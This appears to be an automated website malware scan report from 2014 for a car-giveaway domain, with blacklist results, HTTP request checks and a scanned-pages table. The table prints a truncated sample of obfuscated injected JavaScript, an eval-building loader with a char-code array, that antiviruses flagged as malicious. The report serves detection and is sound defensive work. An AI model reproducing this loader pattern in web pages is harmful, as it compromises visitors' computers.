Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brownsmazdagiveaway.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brownsmazdagiveaway.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://brownsmazdagiveaway.com/ | 200 OK Content-Length: 2970 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122 Antivirus reports:
| ||
http://brownsmazdagiveaway.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brownsmazdagiveaway.com
Result:
HTTP/1.1 200 OK
Date: Tue, 16 Sep 2014 22:19:26 GMT
Server: Microsoft-IIS/7.0
Content-Length: 2970
Content-Type: text/html
Set-Cookie: __utmfr=453; expires=Tue, 23-Sep-2014 22:19:27 GMT; path=/
X-Powered-By: ASP.NET
...2970 bytes of data.
GET / HTTP/1.1
Host: brownsmazdagiveaway.com
Result:
HTTP/1.1 200 OK
Date: Tue, 16 Sep 2014 22:19:26 GMT
Server: Microsoft-IIS/7.0
Content-Length: 2970
Content-Type: text/html
Set-Cookie: __utmfr=453; expires=Tue, 23-Sep-2014 22:19:27 GMT; path=/
X-Powered-By: ASP.NET
...2970 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: brownsmazdagiveaway.com
Referer: http://www.google.com/search?q=brownsmazdagiveaway.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: brownsmazdagiveaway.com
Referer: http://www.google.com/search?q=brownsmazdagiveaway.com
Result:
The result is similar to the first query. There are no suspicious redirects found.